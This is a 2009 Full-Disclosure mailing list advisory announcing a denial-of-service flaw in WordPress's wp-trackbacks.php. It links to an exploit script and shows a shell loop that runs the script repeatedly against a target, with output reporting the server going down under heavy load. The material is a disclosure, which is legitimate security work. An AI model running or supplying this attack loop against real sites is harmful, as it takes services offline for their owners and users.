Message-ID: <4ADC52C2.6090708@zerial.org>
Date: Mon, 19 Oct 2009 08:51:30 -0300
From: "Zerial." <fernando@...ial.org>
To: full-disclosure@...ts.grok.org.uk
Subject: [Wordpress] Resource Exhaustion (Denial of Service)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
jcarlosn [http://rooibo.wordpress.com/] has discovered a Denial of
Service by Resource Exhaustion in all WordPress versions.
This vulnerability affects the wp-trackbacks.php file, and an exploit
for it is already available.
The exploit: http://codes.zerial.org/php/wp-trackbacks_dos.phps
Execution:
$ while /bin/true; do php test.php http://target.bom/wordpress; done
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
Notice: fputs(): send of 8192 bytes failed with errno=11 Resource temporarily unavailable
down!!
Load average: 22.07, 15.18, 8.58 (on target server)
- --
Fernando A. Lagos Berardi - Zerial
Desarrollador y Programador Web
Seguridad Informatica
Linux User #382319
Blog: http://blog.zerial.org
Skype: erzerial
Jabber: zerial@...beres.org
GTalk && MSN: fernando@...ial.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAkrcUsIACgkQIP17Kywx9JQnNQCeOwPir0lZxguy8d4LDmNzKxD8
CyYAoJEEAaoyOnE09VbVRveUQU7Uapcq
=pFaY
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/